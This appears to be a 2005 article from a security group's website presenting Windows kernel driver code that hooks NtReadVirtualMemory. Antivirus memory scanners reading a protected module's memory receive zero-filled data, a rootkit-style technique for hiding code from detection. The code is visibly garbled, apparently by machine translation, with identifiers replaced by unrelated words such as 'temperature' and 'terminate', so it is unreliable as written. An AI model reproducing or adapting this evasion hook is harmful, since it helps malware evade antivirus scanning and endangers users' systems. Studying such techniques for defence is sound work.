Anti-Virus Software Memory Scan

Author: Polymorphours

Email: Polymorphours@whitecell.org

Homepage: http://www.whitecell.org

Date: 2005-11-17

/* ++ Author: PolymorphoursDate: 2005/1/10 through the NtReadVirtualMemory hook, to prevent other processes from scanning the protected module. If other processes are found to read the memory of the protected module, 0 -- */typedef struct _ expect {LIST_ENTRY InLoadOrderLinks; LIST_ENTRY comment; PVOID DllBase; PVOID EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; /* + 0x034 Flags: Uint4B + 0x038 LoadCount: Uint2B + 0x03a TlsIndex: Uint2B + 0x03c HashLinks: _ LIST_ENTRY + 0x03c SectionPointer: Ptr32 Void + 0x040 CheckSum: uint4B + 0x044 TimeDateStamp: Uint4B + 0x044 LoadedImports: Ptr32 Void + 0x048 handle: Ptr32 Void + 0x04c PatchInformation: Ptr32 Void */} Handle, * handle; /* ++ function name: MyNtReadVirtualMemory parameter: INHANDLEProcessHandle, INPVOIDBaseAddress, OUTPVOIDBuffer, INULONGBufferLength, feature: hides the memory of the protection module. If any memory is found to scan this memory, then, the encrypted data is returned during the scanning process: NTSTATUS -- */interrupt (response, INPVOIDBaseAddress, OUTPVOIDBuffer, INULONGBufferLength, timeout) {NTSTATUSstatus; PEPROCESSeProcess; PVOIDPeb; interrupt; wait; PLIST_ENTRYBlink; PPROTECT_NODEFileNode = NULL; temperature = FALSE; ULONGImageMaxAddress = 0;/* # ifdef _ debugdbuplint ("Call Process: % s, BaseAddress: % 08x \ n", PsGetProcessImageFileName (

PsGetCurrentProcess (), BaseAddress); # endif */status = values (ProcessHandle, FILE_READ_DATA, PsProcessType, KernelMode, (PVOID) & eProcess, NULL); if (NT_SUCCESS (status )) {// obtain the PEB address // Peb = (PVOID) (* (PULONG) (PCHAR) eProcess + PebOffset )); //// switch to the target process space // KeAttachProcess (eProcess); //// determine whether PEB is valid. If yes, then, use the PEB structure to traverse the modules loaded by the process. // if (! MmIsAddressValid (Peb) {/* # ifdef _ debugdbuplint ("PEB is error. \ n "); # endif */KeDetachProcess (); ObDereferenceObject (eProcess); goto CLEANUP;} PebLdrData = (PPEB_LDR_DATA) (* (PULONG) (PCHAR) peb + 0xc); if (! PebLdrData) {KeDetachProcess (); ObDereferenceObject (eProcess); goto CLEANUP;} try {ProbeForRead (PebLdrData, sizeof (PEB_LDR_DATA), sizeof (ULONG )); /// traverse the module linked list // LdrDataTableHeadList = (PLDR_DATA_TABLE_ENTRY) PebLdrData

-> InLoadOrderModuleList. Flink; LdrDataTableEntry = LdrDataTableHeadList; do {ProbeForRead (LdrDataTableEntry, sizeof (LDR_DATA_TABLE_ENTRY), sizeof (ULONG); if (! LdrDataTableEntry-> DllBase) {LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY) LdrDataTableEntry

-> InLoadOrderLinks. flink; continue;} //// determine which module the Read Memory belongs to. If none of them belong to, run the following command: // ImageMaxAddress = (ULONG) ldrDataTableEntry-> DllBase +

LdrDataTableEntry-> SizeOfImage); if (ULONG) BaseAddress + BufferLength) <

(ULONG) LdrDataTableEntry-> DllBase | (ULONG) BaseAddress> ImageMaxAddress) {// if it is not a read module area, enumerate the next // LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY) LdrDataTableEntry->

InLoadOrderLinks. Flink; continue;} // If the module is protected, FALSE data is returned // bHideFlag = FALSE; Blink = ProtectFile. Blink; while (Blink! = & ProtectFile) {FileNode = CONTAINING_RECORD (Blink, PROTECT_NODE, ActiveLink); // if the current file is found to exist in the hidden list, set the hidden flag to hide it. // if (wcsstr (FileNode-> ProtectName, Ldr

DataTableEntry-> FullDllName. buffer) {bHideFlag = TRUE; break;} Blink = Blink-> Blink;} if (bHideFlag) {// return the original process space for processing // KeDetachProcess (); ObDereferenceObject (eProcess); ProbeForWrite (Buffer, BufferLength, sizeof (ULONG); memset (Buffer, 0x00, BufferLength); ProbeForWrite (ReturnLength, sizeof (PULONG), sizeof (ULONG); * ReturnLength = BufferLength; return STATUS_SUCCESS;} LdrDataTableEntry = (optional) LdrDataTableEntry

-> InLoadOrderLinks. Flink;} while (LdrDataTableEntry! = LdrDataTableHeadList);} couldn t (prediction_execute_handler) {if (! BHideFlag) {KeDetachProcess (); terminate (eProcess);} goto CLEANUP;} KeDetachProcess (); terminate (eProcess);} CLEANUP: return NtReadVirtualMemory (ProcessHandle, BaseAddress, Buffer, BufferLength, returnLength );}

WSS (Whitecell Security Systems) is a non-profit civil technology organization dedicated to the research of various system Security technologies. Stick to the traditional hacker spirit and pursue the pure technology.

WSS home: http://www.whitecell.org/

WSS Forum: http://www.whitecell.org/forums/